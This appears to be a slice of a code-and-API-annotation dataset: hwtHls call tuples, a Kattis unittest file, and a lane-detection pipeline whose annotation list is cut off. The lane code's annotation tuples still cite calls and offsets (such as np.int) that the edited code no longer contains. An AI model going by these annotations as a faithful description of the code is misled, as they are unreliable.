] | [((1344, 1384), 'hwtHls.ssa.basicBlock.SsaBasicBlock.__init__', 'SsaBasicBlock.__init__', (['self', 'ctx', 'label'], {}), '(self, ctx, label)\n', (1366, 1384), False, 'from hwtHls.ssa.basicBlock import SsaBasicBlock\n'), ((3187, 3224), 'hwtHls.ssa.basicBlock.SsaBasicBlock', 'SsaBasicBlock', (['ssaCtx', 'startBlockName'], {}), '(ssaCtx, startBlockName)\n', (3200, 3224), False, 'from hwtHls.ssa.basicBlock import SsaBasicBlock\n'), ((3248, 3302), 'hwtHls.ssa.translation.fromAst.memorySSAUpdater.MemorySSAUpdater', 'MemorySSAUpdater', (['self._onBlockReduce', 'self.visit_expr'], {}), '(self._onBlockReduce, self.visit_expr)\n', (3264, 3302), False, 'from hwtHls.ssa.translation.fromAst.memorySSAUpdater import MemorySSAUpdater\n'), ((3989, 4026), 'hwtHls.ssa.basicBlock.SsaBasicBlock', 'SsaBasicBlock', (['predecessor.ctx', 'label'], {}), '(predecessor.ctx, label)\n', (4002, 4026), False, 'from hwtHls.ssa.basicBlock import SsaBasicBlock\n'), ((12655, 12705), 'hwtHls.ssa.basicBlock.SsaBasicBlock', 'SsaBasicBlock', (['self.ssaCtx', 'f"""{block.label:s}_IfE"""'], {}), "(self.ssaCtx, f'{block.label:s}_IfE')\n", (12668, 12705), False, 'from hwtHls.ssa.basicBlock import SsaBasicBlock\n'), ((7182, 7243), 'hwtHls.ssa.instr.SsaInstr', 'SsaInstr', (['block.ctx', 'var._dtype', 'op.operator', 'ops'], {'origin': 'var'}), '(block.ctx, var._dtype, op.operator, ops, origin=var)\n', (7190, 7243), False, 'from hwtHls.ssa.instr import SsaInstr, SsaInstrBranch\n'), ((8077, 8130), 'hwtHls.hlsStreamProc.statements.HlsStreamProcWhile', 'HlsStreamProcWhile', (['o.parent', 'o.cond', '(o.body + o.step)'], {}), '(o.parent, o.cond, o.body + o.step)\n', (8095, 8130), False, 'from hwtHls.hlsStreamProc.statements import HlsStreamProcStm, HlsStreamProcWhile, HlsStreamProcWrite, HlsStreamProcRead, HlsStreamProcCodeBlock, HlsStreamProcIf, HlsStreamProcFor, HlsStreamProcContinue, HlsStreamProcBreak\n'), ((9006, 9056), 'hwtHls.ssa.basicBlock.SsaBasicBlock', 'SsaBasicBlock', (['block.ctx', 
'f"""{block.label:s}_whEnd"""'], {}), "(block.ctx, f'{block.label:s}_whEnd')\n", (9019, 9056), False, 'from hwtHls.ssa.basicBlock import SsaBasicBlock\n')] |
import io
import unittest
from unittest.mock import patch
from kattis import k_apaxiaaans
###############################################################################
class SampleInput(unittest.TestCase):
    '''Problem statement sample inputs and outputs.'''

    def _assert_main(self, inputs, outputs):
        """Run k_apaxiaaans.main with *inputs* on stdin and assert that it
        writes exactly *outputs* to stdout and consumes all of stdin.

        Extracted helper: the three sample tests previously duplicated this
        patch/run/assert body verbatim.
        """
        with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
             patch('sys.stdout', new_callable=io.StringIO) as stdout:
            k_apaxiaaans.main()
            self.assertEqual(stdout.getvalue(), outputs)
            self.assertEqual(stdin.read(), '')

    def test_sample_input_1(self):
        '''Run and assert problem statement sample 1 input and output.'''
        self._assert_main('robert\n', 'robert\n')

    def test_sample_input_2(self):
        '''Run and assert problem statement sample 2 input and output.'''
        self._assert_main('rooobert\n', 'robert\n')

    def test_sample_input_3(self):
        '''Run and assert problem statement sample 3 input and output.'''
        self._assert_main('roooooobertapalaxxxxios\n', 'robertapalaxios\n')
###############################################################################
if __name__ == '__main__':
    # Run the test suite when this file is executed directly.
    unittest.main()
| [
"unittest.main",
"kattis.k_apaxiaaans.main",
"io.StringIO",
"unittest.mock.patch"
] | [((1719, 1734), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1732, 1734), False, 'import unittest\n'), ((509, 554), 'unittest.mock.patch', 'patch', (['"""sys.stdout"""'], {'new_callable': 'io.StringIO'}), "('sys.stdout', new_callable=io.StringIO)\n", (514, 554), False, 'from unittest.mock import patch\n'), ((578, 597), 'kattis.k_apaxiaaans.main', 'k_apaxiaaans.main', ([], {}), '()\n', (595, 597), False, 'from kattis import k_apaxiaaans\n'), ((949, 994), 'unittest.mock.patch', 'patch', (['"""sys.stdout"""'], {'new_callable': 'io.StringIO'}), "('sys.stdout', new_callable=io.StringIO)\n", (954, 994), False, 'from unittest.mock import patch\n'), ((1018, 1037), 'kattis.k_apaxiaaans.main', 'k_apaxiaaans.main', ([], {}), '()\n', (1035, 1037), False, 'from kattis import k_apaxiaaans\n'), ((1413, 1458), 'unittest.mock.patch', 'patch', (['"""sys.stdout"""'], {'new_callable': 'io.StringIO'}), "('sys.stdout', new_callable=io.StringIO)\n", (1418, 1458), False, 'from unittest.mock import patch\n'), ((1482, 1501), 'kattis.k_apaxiaaans.main', 'k_apaxiaaans.main', ([], {}), '()\n', (1499, 1501), False, 'from kattis import k_apaxiaaans\n'), ((464, 483), 'io.StringIO', 'io.StringIO', (['inputs'], {}), '(inputs)\n', (475, 483), False, 'import io\n'), ((904, 923), 'io.StringIO', 'io.StringIO', (['inputs'], {}), '(inputs)\n', (915, 923), False, 'import io\n'), ((1368, 1387), 'io.StringIO', 'io.StringIO', (['inputs'], {}), '(inputs)\n', (1379, 1387), False, 'import io\n')] |
"""
# !/usr/bin/env python
# -*- coding: utf-8 -*-
@Time : 2022/2/24 20:12
@Author : <EMAIL>
@ProjectName : udacity-program_self_driving_car_engineer_v1.0_source.0
@File : full_pipeline.py
"""
import numpy as np
import cv2
import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import glob
from moviepy.editor import VideoFileClip
# Load in the chessboard calibration images to a list
cal_image_loc = glob.glob('camera_cal/calibration*.jpg')

# Prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
# for a 9x6 inner-corner chessboard on the z=0 plane.
objp = np.zeros((6 * 9, 3), np.float32)
objp[:, :2] = np.mgrid[0:9, 0:6].T.reshape(-1, 2)

# Arrays for later storing object points and image points
obj_points = []  # 3d points in real world space
img_points = []  # 2d points in image plane.

# Make a list of calibration images
calibration_images = []

for im in cal_image_loc:
    img = mpimg.imread(im)
    calibration_images.append(img)

# Set True to visualize the detected corners while calibrating.
verbose = False
# Iterate through images for their points
for image in calibration_images:
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)

    # Find the chessboard corners
    pattern_found, corners = cv2.findChessboardCorners(gray, (9, 6), None)

    if pattern_found is True:
        obj_points.append(objp)
        img_points.append(corners)
        if verbose:
            # Draw and display the corners
            img = cv2.drawChessboardCorners(image, (9, 6), corners, pattern_found)
            cv2.imshow('img', img)
            cv2.waitKey(500)
if verbose:
    cv2.destroyAllWindows()

# Returns camera calibration
# NOTE(review): `gray` leaks out of the loop above — this raises NameError
# if camera_cal/ contains no matching images; assumes at least one image.
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(obj_points, img_points, gray.shape[::-1], None, None)
class Left_Line():
    """
    State tracker for the left lane line across video frames.
    NOTE(review): identical to Right_Line; the two could share one Line class.
    """

    def __init__(self):
        # was the line detected in the last iteration?
        self.detected = False
        # recent polynomial coefficients
        self.recent_fit = []
        # polynomial coefficients averaged over the last n iterations
        self.best_fit = None
        # polynomial coefficients for the most recent fit
        self.current_fit = [np.array([False])]
        # difference in fit coefficients between last and new fits
        self.diffs = np.array([0, 0, 0], dtype='float')
        # x values for detected line pixels
        self.allx = None
        # y values for detected line pixels
        self.ally = None
        # counter to reset after 5 iterations if issues arise
        self.counter = 0
class Right_Line():
    """
    State tracker for the right lane line across video frames.
    NOTE(review): identical to Left_Line; the two could share one Line class.
    """

    def __init__(self):
        # was the line detected in the last iteration?
        self.detected = False
        # recent polynomial coefficients
        self.recent_fit = []
        # polynomial coefficients averaged over the last n iterations
        self.best_fit = None
        # polynomial coefficients for the most recent fit
        self.current_fit = [np.array([False])]
        # difference in fit coefficients between last and new fits
        self.diffs = np.array([0, 0, 0], dtype='float')
        # x values for detected line pixels
        self.allx = None
        # y values for detected line pixels
        self.ally = None
        # counter to reset after 5 iterations if issues arise
        self.counter = 0
def pipeline(img, s_thresh=(125, 255), sx_thresh=(10, 100), R_thresh=(200, 255), sobel_kernel=3):
    """ Pipeline to create binary image.
    This version uses thresholds on the R & S color channels and Sobelx.
    Binary activation occurs where any two of the three are activated.

    :param img: RGB input frame
    :param s_thresh: (lo, hi) threshold for the HLS S channel
    :param sx_thresh: (lo, hi) threshold for the scaled Sobel-x gradient
    :param R_thresh: (lo, hi) threshold for the RGB R channel
    :param sobel_kernel: Sobel kernel size (odd)
    :return: uint8 binary image, 1 where >=2 of the 3 criteria activate
    """
    distorted_img = np.copy(img)
    # Undistort using the module-level calibration (mtx, dist).
    dst = cv2.undistort(distorted_img, mtx, dist, None, mtx)
    # Pull R
    R = dst[:, :, 0]
    # Convert to HLS colorspace.
    # BUG FIX: `np.float` was deprecated in NumPy 1.20 and removed in 1.24,
    # which made this line raise AttributeError; np.float64 is the exact
    # dtype the old alias resolved to.
    hls = cv2.cvtColor(dst, cv2.COLOR_RGB2HLS).astype(np.float64)
    l_channel = hls[:, :, 1]
    s_channel = hls[:, :, 2]
    # Sobelx - takes the derivate in x, absolute value, then rescale
    sobelx = cv2.Sobel(l_channel, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
    abs_sobelx = np.absolute(sobelx)
    scaled_sobelx = np.uint8(255 * abs_sobelx / np.max(abs_sobelx))

    # Threshold x gradient
    sxbinary = np.zeros_like(scaled_sobelx)
    sxbinary[(scaled_sobelx >= sx_thresh[0]) & (scaled_sobelx <= sx_thresh[1])] = 1

    # Threshold R color channel
    R_binary = np.zeros_like(R)
    R_binary[(R >= R_thresh[0]) & (R <= R_thresh[1])] = 1

    # Threshold S color channel
    s_binary = np.zeros_like(s_channel)
    s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1

    # If two of the three are activated, activate in the binary image
    combined_binary = np.zeros_like(sxbinary)
    combined_binary[((s_binary == 1) & (sxbinary == 1)) | ((sxbinary == 1) & (R_binary == 1))
                    | ((s_binary == 1) & (R_binary == 1))] = 1

    return combined_binary
def birds_eye(img, mtx, dist):
    """Warp a frame to a top-down ("bird's eye") view of the road.

    The frame is first run through the binary thresholding pipeline and
    undistorted with the supplied camera calibration, then a perspective
    transform maps a fixed trapezoid of lane-line edge points onto a
    rectangle, as if viewed from directly above.

    :param img: input RGB frame
    :param mtx: camera matrix from calibration
    :param dist: distortion coefficients from calibration
    :return: (warped binary image, perspective transform matrix M)
    """
    # Binary lane-pixel image, then undistort it.
    binary_img = pipeline(img)
    undist = cv2.undistort(binary_img, mtx, dist, None, mtx)

    width = undist.shape[1]
    height = undist.shape[0]
    img_size = (width, height)

    # Source points - defined area of lane line edges.
    src = np.float32([[690, 450], [1110, height], [175, height], [595, 450]])

    # Destination rectangle, inset from the image edges by a fixed offset.
    offset = 300
    dst = np.float32([[width - offset, 0],
                      [width - offset, height],
                      [offset, height],
                      [offset, 0]])

    # Compute the transform and warp to the top-down view.
    M = cv2.getPerspectiveTransform(src, dst)
    top_down = cv2.warpPerspective(undist, M, img_size)

    return top_down, M
def count_check(line):
    """Reset a lane line to undetected after five consecutive failures,
    forcing the next frame to fall back to a fresh sliding-window search.

    :param line: Left_Line/Right_Line instance with `counter` and `detected`
    """
    too_many_failures = line.counter >= 5
    if too_many_failures:
        line.detected = False
def first_lines(img, mtx, dist):
    """Locate both lane lines from scratch with a sliding-window search.

    Takes the bird's-eye binary image, builds a histogram of activations in
    the bottom half to find the two lane bases, then steps 9 windows up the
    image re-centering on the detected pixels. Fits a second-order polynomial
    to each line and stores the results on the module-level ``left_line`` /
    ``right_line`` state objects (current_fit, best_fit, detected, counter).

    Args:
        img: input road frame.
        mtx: camera matrix from calibration.
        dist: distortion coefficients from calibration.
    """
    # Load the birds eye image and transform matrix from birds_eye
    binary_warped, perspective_M = birds_eye(img, mtx, dist)
    # Histogram of the bottom half of the image.
    # Fix: use integer floor division -- a float slice index
    # (shape[0] / 2) raises a TypeError on Python 3.
    histogram = np.sum(binary_warped[binary_warped.shape[0] // 2:, :], axis=0)
    # Output image to draw on and visualize the result
    out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
    # Find the peak of the left and right halves of the histogram.
    # These will be the starting point for the left and right lines.
    # Fix: np.int was removed in NumPy 1.20; plain // already yields int.
    midpoint = histogram.shape[0] // 2
    leftx_base = np.argmax(histogram[:midpoint])
    rightx_base = np.argmax(histogram[midpoint:]) + midpoint
    # Choose the number of sliding windows
    nwindows = 9
    # Set height of windows (integer division, see np.int note above)
    window_height = binary_warped.shape[0] // nwindows
    # Identify the x and y positions of all nonzero pixels in the image
    nonzero = binary_warped.nonzero()
    nonzeroy = np.array(nonzero[0])
    nonzerox = np.array(nonzero[1])
    # Current positions to be updated for each window
    leftx_current = leftx_base
    rightx_current = rightx_base
    # Set the width of the windows +/- margin
    margin = 100
    # Set minimum number of pixels found to recenter window
    minpix = 50
    # Create empty lists to receive left and right lane pixel indices
    left_lane_inds = []
    right_lane_inds = []
    # Step through the windows one by one
    for window in range(nwindows):
        # Identify window boundaries in x and y (and right and left)
        win_y_low = binary_warped.shape[0] - (window + 1) * window_height
        win_y_high = binary_warped.shape[0] - window * window_height
        win_xleft_low = leftx_current - margin
        win_xleft_high = leftx_current + margin
        win_xright_low = rightx_current - margin
        win_xright_high = rightx_current + margin
        # Draw the windows on the visualization image
        cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)
        cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)
        # Identify the nonzero pixels in x and y within the window
        good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (
            nonzerox < win_xleft_high)).nonzero()[0]
        good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (
            nonzerox < win_xright_high)).nonzero()[0]
        # Append these indices to the lists
        left_lane_inds.append(good_left_inds)
        right_lane_inds.append(good_right_inds)
        # If you found > minpix pixels, recenter next window on their mean position
        if len(good_left_inds) > minpix:
            leftx_current = int(np.mean(nonzerox[good_left_inds]))
        if len(good_right_inds) > minpix:
            rightx_current = int(np.mean(nonzerox[good_right_inds]))
    # Concatenate the arrays of indices
    left_lane_inds = np.concatenate(left_lane_inds)
    right_lane_inds = np.concatenate(right_lane_inds)
    # Extract left and right line pixel positions
    leftx = nonzerox[left_lane_inds]
    lefty = nonzeroy[left_lane_inds]
    rightx = nonzerox[right_lane_inds]
    righty = nonzeroy[right_lane_inds]
    # Fit a second order polynomial to each.
    # The challenge videos sometimes throw errors, so try first and set
    # line.detected to False upon failure. Left line first.
    try:
        # Keep only the n most recent fits when smoothing.
        n = 5
        left_line.current_fit = np.polyfit(lefty, leftx, 2)
        left_line.all_x = leftx
        left_line.all_y = lefty
        left_line.recent_fit.append(left_line.current_fit)
        if len(left_line.recent_fit) > 1:
            left_line.diffs = (left_line.recent_fit[-2] - left_line.recent_fit[-1]) / left_line.recent_fit[-2]
        left_line.recent_fit = left_line.recent_fit[-n:]
        left_line.best_fit = np.mean(left_line.recent_fit, axis=0)
        left_fit = left_line.current_fit
        left_line.detected = True
        left_line.counter = 0
    except TypeError:
        left_fit = left_line.best_fit
        left_line.detected = False
    except np.linalg.LinAlgError:
        left_fit = left_line.best_fit
        left_line.detected = False
    # Next, right line
    try:
        n = 5
        right_line.current_fit = np.polyfit(righty, rightx, 2)
        right_line.all_x = rightx
        right_line.all_y = righty
        right_line.recent_fit.append(right_line.current_fit)
        if len(right_line.recent_fit) > 1:
            right_line.diffs = (right_line.recent_fit[-2] - right_line.recent_fit[-1]) / right_line.recent_fit[-2]
        right_line.recent_fit = right_line.recent_fit[-n:]
        right_line.best_fit = np.mean(right_line.recent_fit, axis=0)
        right_fit = right_line.current_fit
        right_line.detected = True
        right_line.counter = 0
    except TypeError:
        right_fit = right_line.best_fit
        right_line.detected = False
    except np.linalg.LinAlgError:
        right_fit = right_line.best_fit
        right_line.detected = False
def second_ord_poly(line, val):
    """Evaluate the quadratic a*val**2 + b*val + c.

    Used by draw_lines to find where a fitted lane line intersects the
    bottom of the image when computing distance from lane center.

    Args:
        line: coefficient triple ``[a, b, c]`` (highest order first).
        val: point at which to evaluate the polynomial.

    Returns:
        The polynomial value at ``val``.
    """
    a, b, c = line[0], line[1], line[2]
    return a * val ** 2 + b * val + c
def draw_lines(img, mtx, dist):
    """Draw the detected lane onto the frame with curvature / position text.

    If either line was not detected in the previous frame, fall back to the
    full sliding-window search (first_lines); otherwise search only within a
    margin of the previous fits. Re-fits both lines, computes curvature in
    meters and the car's offset from lane center, then unwarps the lane
    polygon back onto the original image.

    Args:
        img: input road frame.
        mtx: camera matrix from calibration.
        dist: distortion coefficients from calibration.

    Returns:
        The input frame with lane area, curvature and offset annotations.
    """
    # Pull in the image
    binary_warped, perspective_M = birds_eye(img, mtx, dist)
    # Check if lines were last detected; if not, re-run first_lines.
    # Fix: the original `a == False | b == False` parses as a chained
    # comparison around bitwise OR, which is NOT "either line undetected".
    if not left_line.detected or not right_line.detected:
        first_lines(img, mtx, dist)
    # Set the fit as the current fit for now
    left_fit = left_line.current_fit
    right_fit = right_line.current_fit
    # Again, find the lane indicators
    nonzero = binary_warped.nonzero()
    nonzeroy = np.array(nonzero[0])
    nonzerox = np.array(nonzero[1])
    margin = 100
    # Keep only pixels within +/- margin of the previous polynomial fits.
    left_lane_inds = ((nonzerox > (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] - margin)) & (
        nonzerox < (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] + margin)))
    right_lane_inds = (
        (nonzerox > (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] - margin)) & (
            nonzerox < (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] + margin)))
    # Set the x and y values of points on each line
    leftx = nonzerox[left_lane_inds]
    lefty = nonzeroy[left_lane_inds]
    rightx = nonzerox[right_lane_inds]
    righty = nonzeroy[right_lane_inds]
    # Fit a second order polynomial to each again.
    # Similar to first_lines, need to try in case of errors. Left line first.
    try:
        n = 5
        left_line.current_fit = np.polyfit(lefty, leftx, 2)
        left_line.all_x = leftx
        left_line.all_y = lefty
        left_line.recent_fit.append(left_line.current_fit)
        if len(left_line.recent_fit) > 1:
            left_line.diffs = (left_line.recent_fit[-2] - left_line.recent_fit[-1]) / left_line.recent_fit[-2]
        left_line.recent_fit = left_line.recent_fit[-n:]
        left_line.best_fit = np.mean(left_line.recent_fit, axis=0)
        left_fit = left_line.current_fit
        left_line.detected = True
        left_line.counter = 0
    except TypeError:
        left_fit = left_line.best_fit
        count_check(left_line)
    except np.linalg.LinAlgError:
        left_fit = left_line.best_fit
        count_check(left_line)
    # Now right line
    try:
        n = 5
        right_line.current_fit = np.polyfit(righty, rightx, 2)
        right_line.all_x = rightx
        right_line.all_y = righty
        right_line.recent_fit.append(right_line.current_fit)
        if len(right_line.recent_fit) > 1:
            right_line.diffs = (right_line.recent_fit[-2] - right_line.recent_fit[-1]) / right_line.recent_fit[-2]
        right_line.recent_fit = right_line.recent_fit[-n:]
        right_line.best_fit = np.mean(right_line.recent_fit, axis=0)
        right_fit = right_line.current_fit
        right_line.detected = True
        right_line.counter = 0
    except TypeError:
        right_fit = right_line.best_fit
        count_check(right_line)
    except np.linalg.LinAlgError:
        right_fit = right_line.best_fit
        count_check(right_line)
    # Generate x and y values for plotting
    fity = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])
    fit_leftx = left_fit[0] * fity ** 2 + left_fit[1] * fity + left_fit[2]
    fit_rightx = right_fit[0] * fity ** 2 + right_fit[1] * fity + right_fit[2]
    # Create an image to draw on and an image to show the selection window
    out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
    window_img = np.zeros_like(out_img)
    # Color in left and right line pixels
    out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
    out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
    # Generate a polygon to illustrate the search window area
    # And recast the x and y points into usable format for cv2.fillPoly()
    left_line_window1 = np.array([np.transpose(np.vstack([fit_leftx - margin, fity]))])
    left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([fit_leftx + margin, fity])))])
    left_line_pts = np.hstack((left_line_window1, left_line_window2))
    right_line_window1 = np.array([np.transpose(np.vstack([fit_rightx - margin, fity]))])
    right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([fit_rightx + margin, fity])))])
    right_line_pts = np.hstack((right_line_window1, right_line_window2))
    # Calculate the pixel curve radius
    y_eval = np.max(fity)
    left_curverad = ((1 + (2 * left_fit[0] * y_eval + left_fit[1]) ** 2) ** 1.5) / np.absolute(2 * left_fit[0])
    right_curverad = ((1 + (2 * right_fit[0] * y_eval + right_fit[1]) ** 2) ** 1.5) / np.absolute(2 * right_fit[0])
    # Define conversions in x and y from pixels space to meters
    ym_per_pix = 30 / 720  # meters per pixel in y dimension
    xm_per_pix = 3.7 / 700  # meters per pixel in x dimension
    # Fit new polynomials to x,y in world space
    left_fit_cr = np.polyfit(left_line.all_y * ym_per_pix, left_line.all_x * xm_per_pix, 2)
    right_fit_cr = np.polyfit(right_line.all_y * ym_per_pix, right_line.all_x * xm_per_pix, 2)
    # Calculate the new radii of curvature (in meters, overriding the
    # pixel-space radii computed above)
    left_curverad = ((1 + (2 * left_fit_cr[0] * y_eval * ym_per_pix + left_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
        2 * left_fit_cr[0])
    right_curverad = ((1 + (2 * right_fit_cr[0] * y_eval * ym_per_pix + right_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
        2 * right_fit_cr[0])
    avg_rad = round(np.mean([left_curverad, right_curverad]), 0)
    rad_text = "Radius of Curvature = {}(m)".format(avg_rad)
    # Calculating middle of the image, aka where the car camera is
    middle_of_image = img.shape[1] / 2
    car_position = middle_of_image * xm_per_pix
    # Calculating middle of the lane
    left_line_base = second_ord_poly(left_fit_cr, img.shape[0] * ym_per_pix)
    right_line_base = second_ord_poly(right_fit_cr, img.shape[0] * ym_per_pix)
    lane_mid = (left_line_base + right_line_base) / 2
    # Calculate distance from center and list differently based on left or right
    dist_from_center = lane_mid - car_position
    if dist_from_center >= 0:
        center_text = "{} meters left of center".format(round(dist_from_center, 2))
    else:
        center_text = "{} meters right of center".format(round(-dist_from_center, 2))
    # List car's position in relation to middle on the image and radius of curvature
    font = cv2.FONT_HERSHEY_SIMPLEX
    cv2.putText(img, center_text, (10, 50), font, 1, (255, 255, 255), 2)
    cv2.putText(img, rad_text, (10, 100), font, 1, (255, 255, 255), 2)
    # Invert the transform matrix from birds_eye (to later make the image back to normal below)
    Minv = np.linalg.inv(perspective_M)
    # Create an image to draw the lines on
    warp_zero = np.zeros_like(binary_warped).astype(np.uint8)
    color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
    # Recast the x and y points into usable format for cv2.fillPoly()
    pts_left = np.array([np.transpose(np.vstack([fit_leftx, fity]))])
    pts_right = np.array([np.flipud(np.transpose(np.vstack([fit_rightx, fity])))])
    pts = np.hstack((pts_left, pts_right))
    # Draw the lane onto the warped blank image
    cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))
    # Warp the blank back to original image space using inverse perspective matrix (Minv)
    newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
    # Combine the result with the original image
    result = cv2.addWeighted(img, 1, newwarp, 0.3, 0)
    return result
def process_image(image):
    """Full-pipeline entry point for a single frame.

    Delegates to draw_lines using the module-level calibration (mtx, dist)
    and returns the frame annotated with the lane area, curvature and
    car position.
    """
    return draw_lines(image, mtx, dist)
# Set the class lines equal to the variables used above
# NOTE(review): Left_Line / Right_Line are presumably defined earlier in
# this file -- confirm; they must provide current_fit, recent_fit, best_fit,
# detected, counter, all_x and all_y attributes used by the functions above.
left_line = Left_Line()
right_line = Right_Line()
# Convert to video
# vid_output is where the image will be saved to
vid_output = 'project_video_detected.mp4'
# The file referenced in clip1 is the original video before anything has been done to it
# clip1 = VideoFileClip("project_video.mp4")
# NOTE: this function expects color images
# vid_clip = clip1.fl_image(process_image)
# vid_clip.write_videofile(vid_output, audio=False)
# Batch-process every still image in test_images/ instead of the video:
# annotate each frame, save it under output_images/, and display it
# (cv2 loads BGR, so convert to RGB for matplotlib).
test_img_dir = 'test_images'
for test_img in os.listdir(test_img_dir):
    frame = cv2.imread(os.path.join(test_img_dir, test_img))
    blend = process_image(frame)
    cv2.imwrite('output_images/{}'.format(test_img), blend)
    plt.imshow(cv2.cvtColor(blend, code=cv2.COLOR_BGR2RGB))
    plt.show()
| [
"cv2.rectangle",
"numpy.hstack",
"numpy.polyfit",
"matplotlib.image.imread",
"cv2.imshow",
"numpy.array",
"cv2.warpPerspective",
"cv2.destroyAllWindows",
"cv2.calibrateCamera",
"cv2.findChessboardCorners",
"numpy.mean",
"os.listdir",
"cv2.undistort",
"numpy.max",
"cv2.addWeighted",
"nu... | [((442, 482), 'glob.glob', 'glob.glob', (['"""camera_cal/calibration*.jpg"""'], {}), "('camera_cal/calibration*.jpg')\n", (451, 482), False, 'import glob\n'), ((560, 592), 'numpy.zeros', 'np.zeros', (['(6 * 9, 3)', 'np.float32'], {}), '((6 * 9, 3), np.float32)\n', (568, 592), True, 'import numpy as np\n'), ((1607, 1680), 'cv2.calibrateCamera', 'cv2.calibrateCamera', (['obj_points', 'img_points', 'gray.shape[::-1]', 'None', 'None'], {}), '(obj_points, img_points, gray.shape[::-1], None, None)\n', (1626, 1680), False, 'import cv2\n'), ((20630, 20654), 'os.listdir', 'os.listdir', (['test_img_dir'], {}), '(test_img_dir)\n', (20640, 20654), False, 'import os\n'), ((892, 908), 'matplotlib.image.imread', 'mpimg.imread', (['im'], {}), '(im)\n', (904, 908), True, 'import matplotlib.image as mpimg\n'), ((1048, 1087), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2GRAY'], {}), '(image, cv2.COLOR_BGR2GRAY)\n', (1060, 1087), False, 'import cv2\n'), ((1152, 1197), 'cv2.findChessboardCorners', 'cv2.findChessboardCorners', (['gray', '(9, 6)', 'None'], {}), '(gray, (9, 6), None)\n', (1177, 1197), False, 'import cv2\n'), ((1522, 1545), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1543, 1545), False, 'import cv2\n'), ((3568, 3580), 'numpy.copy', 'np.copy', (['img'], {}), '(img)\n', (3575, 3580), True, 'import numpy as np\n'), ((3591, 3641), 'cv2.undistort', 'cv2.undistort', (['distorted_img', 'mtx', 'dist', 'None', 'mtx'], {}), '(distorted_img, mtx, dist, None, mtx)\n', (3604, 3641), False, 'import cv2\n'), ((3943, 4001), 'cv2.Sobel', 'cv2.Sobel', (['l_channel', 'cv2.CV_64F', '(1)', '(0)'], {'ksize': 'sobel_kernel'}), '(l_channel, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n', (3952, 4001), False, 'import cv2\n'), ((4019, 4038), 'numpy.absolute', 'np.absolute', (['sobelx'], {}), '(sobelx)\n', (4030, 4038), True, 'import numpy as np\n'), ((4150, 4178), 'numpy.zeros_like', 'np.zeros_like', (['scaled_sobelx'], {}), '(scaled_sobelx)\n', (4163, 
4178), True, 'import numpy as np\n'), ((4311, 4327), 'numpy.zeros_like', 'np.zeros_like', (['R'], {}), '(R)\n', (4324, 4327), True, 'import numpy as np\n'), ((4432, 4456), 'numpy.zeros_like', 'np.zeros_like', (['s_channel'], {}), '(s_channel)\n', (4445, 4456), True, 'import numpy as np\n'), ((4624, 4647), 'numpy.zeros_like', 'np.zeros_like', (['sxbinary'], {}), '(sxbinary)\n', (4637, 4647), True, 'import numpy as np\n'), ((5297, 5344), 'cv2.undistort', 'cv2.undistort', (['binary_img', 'mtx', 'dist', 'None', 'mtx'], {}), '(binary_img, mtx, dist, None, mtx)\n', (5310, 5344), False, 'import cv2\n'), ((5488, 5565), 'numpy.float32', 'np.float32', (['[[690, 450], [1110, img_size[1]], [175, img_size[1]], [595, 450]]'], {}), '([[690, 450], [1110, img_size[1]], [175, img_size[1]], [595, 450]])\n', (5498, 5565), True, 'import numpy as np\n'), ((5658, 5774), 'numpy.float32', 'np.float32', (['[[img_size[0] - offset, 0], [img_size[0] - offset, img_size[1]], [offset,\n img_size[1]], [offset, 0]]'], {}), '([[img_size[0] - offset, 0], [img_size[0] - offset, img_size[1]],\n [offset, img_size[1]], [offset, 0]])\n', (5668, 5774), True, 'import numpy as np\n'), ((5873, 5910), 'cv2.getPerspectiveTransform', 'cv2.getPerspectiveTransform', (['src', 'dst'], {}), '(src, dst)\n', (5900, 5910), False, 'import cv2\n'), ((5996, 6036), 'cv2.warpPerspective', 'cv2.warpPerspective', (['undist', 'M', 'img_size'], {}), '(undist, M, img_size)\n', (6015, 6036), False, 'import cv2\n'), ((6688, 6749), 'numpy.sum', 'np.sum', (['binary_warped[binary_warped.shape[0] / 2:, :]'], {'axis': '(0)'}), '(binary_warped[binary_warped.shape[0] / 2:, :], axis=0)\n', (6694, 6749), True, 'import numpy as np\n'), ((7036, 7066), 'numpy.int', 'np.int', (['(histogram.shape[0] / 2)'], {}), '(histogram.shape[0] / 2)\n', (7042, 7066), True, 'import numpy as np\n'), ((7084, 7115), 'numpy.argmax', 'np.argmax', (['histogram[:midpoint]'], {}), '(histogram[:midpoint])\n', (7093, 7115), True, 'import numpy as 